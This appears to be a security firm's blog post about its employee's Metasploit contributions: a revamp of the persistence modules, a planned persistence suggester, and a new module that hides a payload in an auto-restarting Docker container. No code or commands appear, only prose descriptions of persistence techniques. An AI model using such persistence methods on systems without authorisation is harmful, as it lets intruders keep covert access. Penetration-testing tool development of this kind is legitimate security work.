METASPLOIT PROJECT

The Metasploit Project, owned by Rapid 7, is a computer security program which is the world’s most used penetration testing framework. This Free and Open Source Software (FOSS) is used by nearly all penetration testers, and is extremely common in training courses from SANS, EC-Council, and many others.

The Metasploit Project, being Open Source Software, flourishes from the contributions of the community. nDepth’s own Mike Cyr (h00die) is a frequent contributor to the project and has continued to spend their personal time conducting security research and providing enhancements to Metasploit for the benefit of the security community. This month, h00die contributed the following enhancements:

PERSISTENCE REVAMP

About a year ago, one of the Metasploit developers with commit rights, bcoles, suggested revamping how Metasploit handles persistence. Persistence modules sometimes gave you back a shell, sometimes didn’t. There was rarely documentation or code to handle cleaning up the persistence technique. Some modules wouldn’t even start the shell handler for you. These modules typically just had “persistence” in the file name, but other times didn’t. Many lacked documentation. This was definitely an overlooked and underutilized functionality within Metasploit. These modules also mostly utilized techniques outlined in Mitre’s ATT&CK framework, but never referenced it (mostly were written before it existed).

Teaming up with Rapid7’s Diego Ledda, an initial code change was proposed in January. This code added a LOT of new functionality, including starting handlers automatically, creating appropriate timeout values, introducing a cleanup mechanism, and updating many modules to use the new functionality. However, the code changes were too large for one a single Rapid7 reviewer to look at (74 file changes, 5,571 lines of code added, 3,320 lines removed).

After some discussion between Rapid7’s Diego Ledda, Martin Sutovsky and nDepth Security’s h00die, a new strategy was agreed upon. Using the previously established code, but breaking it into smaller pieces would allow for easier review. Starting in August changes started to appear in the framework to establish the new persistence. First Diego’s mixin (library) was added creating the underlying functionality required for the new modules. After that, an avalance of module updates were submitted to standardize each persistence module. The updates to each module included:

1. Testing to ensure the module worked as intended
2. Documentation to outline how to use the module properly
3. Moving the module under a /persistence/ folder for easier identification
4. Testing with additional payloads and architectures
5. Adding Mitre ATT&CK framework references
6. Adding Notes to denote expected behaviors
7. Creating Check methods allowing users to determine if a module will work against a specific target
8. Creating cleanup scripts allowing users to uninstall the persistence
9. Separating larger more complex modules into their base techniques allowing for ease of use

Additionally, two more features were added or should be added soon. The first, and arguably more boring, is documentation on how to properly write a persistence module and utilize the new features. The second feature is mentioned in the next section!

NEW MODULE: PERSISTENCE SUGGESTER

This feature should be added to Metasploit in the very near future! With the new persistence mechanisms, it can be tough to know which will work on a specific target based on the underlying OS, and access. The new persistence suggester will gather all of the persistence modules, check which ones will run against the OS family of a specific target, then use the check method to determine which ones self report that they can be used. This is very similar to the local_exploit_suggester module that currently exists. After running this new module, it’ll be very easy to know which modules should be successful and which likely won’t.

NEW MODULE: PERSISTENT DOCKER IMAGE

While revamping other persistence modules, h00die thought it would be fun to create a new module which takes advantage of systems with Docker installed on them. Docker is a tool that lets you run apps in small, isolated environments so they work the same on any computer. Using this new persistence technique, if a computer is running docker and the user has permission to use it, a light weight Alpine Linux image is downloaded. A payload is embedded into the Alpine container along with a script to automatically restart the payload if it crashes. Then the Alpine container is saved and started on the machine. If the running image of the container is stopped from a system reboot or other reason, it is automatically restarted to reestablish the persistence.

To view this month’s contributions, check the following links:

• https://github.com/rapid7/metasploit-framework/issues/19592
• https://github.com/rapid7/metasploit-framework/issues/20374 
• https://github.com/rapid7/metasploit-framework/pull/19815
• https://github.com/rapid7/metasploit-framework/pull/20381
• https://github.com/rapid7/metasploit-framework/pull/20495
• https://github.com/rapid7/metasploit-framework/pull/20494
• https://github.com/rapid7/metasploit-framework/pull/20497
• https://github.com/rapid7/metasploit-framework/pull/20504
• https://github.com/rapid7/metasploit-framework/pull/20508
• https://github.com/rapid7/metasploit-framework/pull/20509
• https://github.com/rapid7/metasploit-framework/pull/20510
• https://github.com/rapid7/metasploit-framework/pull/20520
• https://github.com/rapid7/metasploit-framework/pull/20521
• https://github.com/rapid7/metasploit-framework/pull/20522
• https://github.com/rapid7/metasploit-framework/pull/20523
• https://github.com/rapid7/metasploit-framework/pull/20524
• https://github.com/rapid7/metasploit-framework/pull/20525
• https://github.com/rapid7/metasploit-framework/pull/20526
• https://github.com/rapid7/metasploit-framework/pull/20527
• https://github.com/rapid7/metasploit-framework/pull/20564
• https://github.com/rapid7/metasploit-framework/pull/20565
• https://github.com/rapid7/metasploit-framework/pull/20536